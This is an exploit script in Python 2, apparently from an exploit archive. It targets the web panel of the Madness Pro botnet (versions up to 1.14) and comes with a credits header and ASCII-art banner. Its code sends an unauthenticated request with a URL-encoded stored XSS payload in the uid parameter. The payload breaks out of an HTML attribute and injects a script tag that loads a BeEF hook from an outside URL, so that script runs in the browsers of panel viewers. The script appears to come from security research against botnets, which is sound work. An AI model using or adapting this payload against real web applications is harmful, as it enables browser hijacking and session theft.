Madness Pro <= 1.14 - Persistent XSS

#!/usr/bin/env python2

# -*- coding: utf-8 -*-

# Exploit Title: Madness Pro <= 1.14 Persistent XSS

# Date: June 05, 2014

# Exploit Author: @botnet_hunter

# Version: 1.14

# Tested on: Apache2 - Ubuntu - MySQL

#              ▄▄▌        ▄▄▄▄·       ▄▄▄▄▄      • ▌ ▄ ·.  ▄· ▄▌

#              ██•  ▪     ▐█ ▀█▪▪     •██  ▪     ·██ ▐███▪▐█▪██▌

#              ██▪   ▄█▀▄ ▐█▀▀█▄ ▄█▀▄  ▐█.▪ ▄█▀▄ ▐█ ▌▐▌▐█·▐█▌▐█▪

#              ▐█▌▐▌▐█▌.▐▌██▄▪▐█▐█▌.▐▌ ▐█▌·▐█▌.▐▌██ ██▌▐█▌ ▐█▀·.

#              .▀▀▀  ▀█▄▀▪·▀▀▀▀  ▀█▄▀▪ ▀▀▀  ▀█▄▀▪▀▀  █▪▀▀▀  ▀ •

#   ▄▄· ▄• ▄▌▄▄▄  ▪   ▐ ▄  ▄▄ •     • ▌ ▄ ·.  ▄▄▄· ·▄▄▄▄   ▐ ▄ ▄▄▄ ..▄▄ · .▄▄ ·

#  ▐█ ▌▪█▪██▌▀▄ █·██ •█▌▐█▐█ ▀ ▪    ·██ ▐███▪▐█ ▀█ ██▪ ██ •█▌▐█▀▄.▀·▐█ ▀. ▐█ ▀.

#  ██ ▄▄█▌▐█▌▐▀▀▄ ▐█·▐█▐▐▌▄█ ▀█▄    ▐█ ▌▐▌▐█·▄█▀▀█ ▐█· ▐█▌▐█▐▐▌▐▀▀▪▄▄▀▀▀█▄▄▀▀▀█▄

#  ▐███▌▐█▄█▌▐█•█▌▐█▌██▐█▌▐█▄▪▐█    ██ ██▌▐█▌▐█ ▪▐▌██. ██ ██▐█▌▐█▄▄▌▐█▄▪▐█▐█▄▪▐█

#  ·▀▀▀  ▀▀▀ .▀  ▀▀▀▀▀▀ █▪·▀▀▀▀     ▀▀  █▪▀▀▀ ▀  ▀ ▀▀▀▀▀• ▀▀ █▪ ▀▀▀  ▀▀▀▀  ▀▀▀▀

#

# Unauthenticated persistent XSS in Madness Pro panel <= 1.14

# Discovered and developed by bwall @botnet_hunter

#

# References:

# http://blog.cylance.com/a-study-in-bots-lobotomy

#

import urllib

# Fill in URL that Madness Pro bot connects back to

panel_url = ""

# Fill in URL to your Javascript payload (the shorter the better)

beef_hook = ""

def install_beef_hook(beef_hook_url, panel_index_url):

f = urllib.urlopen("{0}?uid=12345%3Cimg%20alt%3D\\')%3B%5C%22%3E%3Cscript%20src=\"{1}\">%3C%2Fscript%3E%3C%2Fa%3E"

"%3Ca%20href%3D%22%23%22%20onclick%3D%5C%22set_status(\\'12345".format(panel_index_url,

beef_hook_url))

print f.read()

install_beef_hook(beef_hook, panel_url)